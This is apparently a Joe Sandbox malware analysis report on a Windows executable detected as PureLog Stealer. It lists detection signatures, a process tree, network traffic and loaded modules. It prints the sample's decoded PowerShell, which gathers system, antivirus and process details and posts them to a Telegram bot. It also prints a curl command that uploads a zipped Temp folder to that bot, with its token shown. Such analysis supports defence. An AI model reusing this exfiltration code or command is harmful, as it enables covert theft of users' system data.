Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n0PDCyrFnf.exe

Overview

General Information

Sample name:n0PDCyrFnf.exe
renamed because original name is a hash value
Original sample name:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
Analysis ID:1502365
MD5:88e5d9d97d0e3c83e74926986d6e5ef6
SHA1:37c8bcfde800dea135577b3254b11c6fe639dc21
SHA256:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279
Tags:exe
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • n0PDCyrFnf.exe (PID: 2588 cmdline: "C:\Users\user\Desktop\n0PDCyrFnf.exe" MD5: 88E5D9D97D0E3C83E74926986D6E5EF6)
    • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7112 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • curl.exe (PID: 2080 cmdline: "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
n0PDCyrFnf.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.0.n0PDCyrFnf.exe.880000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_2588.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

          Sigma Signatures

          Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\n0PDCyrFnf.exe, ProcessId: 2588, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: n0PDCyrFnf.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: n0PDCyrFnf.exeVirustotal: Detection: 28%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: n0PDCyrFnf.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: n0PDCyrFnf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 438Expect: 100-continueConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
          Source: unknownHTTP traffic detected: POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 438Expect: 100-continueConnection: Keep-Alive
          Source: n0PDCyrFnf.exe, 00000000.00000002.1825821731.000000001C7F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftL
          Source: n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoftLanguagePackManagement.psd1
          Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: n0PDCyrFnf.exe, 00000000.00000002.1828302488.000000002015D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot$token/sendDocument
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot$token/sendMessage
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58
          Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
          Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument-
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8
          Source: curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC:
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX
          Source: curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_
          Source: curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram.
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP
          Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Reads the Security eventlog
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
          Reads the System eventlog
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B6B0D480_2_00007FFD9B6B0D48
          Source: n0PDCyrFnf.exeStatic PE information: No import functions for PE file found
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003D93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs n0PDCyrFnf.exe
          Source: n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs n0PDCyrFnf.exe
          Source: n0PDCyrFnf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.csCryptographic APIs: 'CreateDecryptor'
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.csCryptographic APIs: 'CreateDecryptor'
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.csCryptographic APIs: 'CreateDecryptor'
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/13@2/2
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n0PDCyrFnf.exe.logJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_03
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1Jump to behavior
          Source: n0PDCyrFnf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()$token = "7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag"$chatId = "-1002165480850"$telegramApiUrl = "https://api.telegram.org/bot$token/sendMessage"function Upload_Telegram_Info { $osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption $uuid = Get-WmiObject -Class Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID $cpu = Get-WmiObject -Class Win32_Processor | Select-Object -ExpandProperty Name $gpu = (Get-WmiObject Win32_VideoController).Name $format = " GB" $total = Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | Foreach {"{0:N2}" -f ([math]::round(($_.Sum / 1GB),2))} $raminfo = "$total" + "$format" function avinfo { $wmiQuery = "SELECT * FROM AntiVirusProduct" $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery $AntivirusProduct.displayName } $avlist = avinfo -autosize | ft | out-string function Get-Uptime { $ts = (Get-Date) - (Get-CimInstance -ClassName Win32_OperatingSystem -ComputerName $computername).LastBootUpTime $uptimedata = '{0} days {1} hours {2} minutes {3} seconds' -f $ts.Days, $ts.Hours, $ts.Minutes, $ts.Seconds $uptimedata }$uptime = Get-Uptime$username = $env:USERNAME$resolution = wmic path Win32_VideoController get VideoModeDescription /format:csv | Select-String -Pattern "\d{3,4} x \d{3,4}" | ForEach-Object { $_.Matches.Value } $message = @"SYSTEM DATA- Antivirus : $avlistHardware:- Uptime: $uptime- OS: $osversion- Screen Size: $resolution- CPU: $cpu- GPU: $gpu- RAM: $raminfo- HWID: $uuid"@ $payload = @{ chat_id = $chatId text = $message parse_mode = "Markdown" } $jsonPayload = $payload | ConvertTo-Json -Depth 10 Invoke-WebRequest -Uri $telegramApiUrl -Method POST -Body $jsonPayload -ContentType "application/json; charset=utf-8" -UseBasicParsing | Out-Null $extractor = "$env:LOCALAPPDATA\Temp\database" New-Item -ItemType Directory -Path $extractor -Force | out-null $env:username > $extractor\username.txt$loadedModules = @() $processes = Get-Process | Where-Object { $_.ProcessName -notlike "svchost*" } foreach ($process in $processes) { try { $modules = $process.Modules | Select-Object -ExpandProperty FileName $modules = $modules | Where-Object { $_ -notmatch "^C:\\WINDOWS\\SYSTEM32" } $loadedModules += $modules } catch { } } $loadedModules = $loadedModules | Sort-Object -Unique $outputFile = "$extractor\DLLs_in_memory.txt" $loadedModules | Out-File -FilePath $outputFile -Encoding UTF8 Get-WmiObject win32_service | Where-Object State -match "running" | Select-Object Name, DisplayName, PathName, User | Sort-Object Name | Format-Table -wrap -autosize > $extractor\running-services.txt Get-WmiObject win32_process | Select-Object Name, Description, ProcessId, Thread
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: n0PDCyrFnf.exeVirustotal: Detection: 28%
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile read: C:\Users\user\Desktop\n0PDCyrFnf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\n0PDCyrFnf.exe "C:\Users\user\Desktop\n0PDCyrFnf.exe"
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\curl.exe "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csvJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\curl.exe "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: mi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
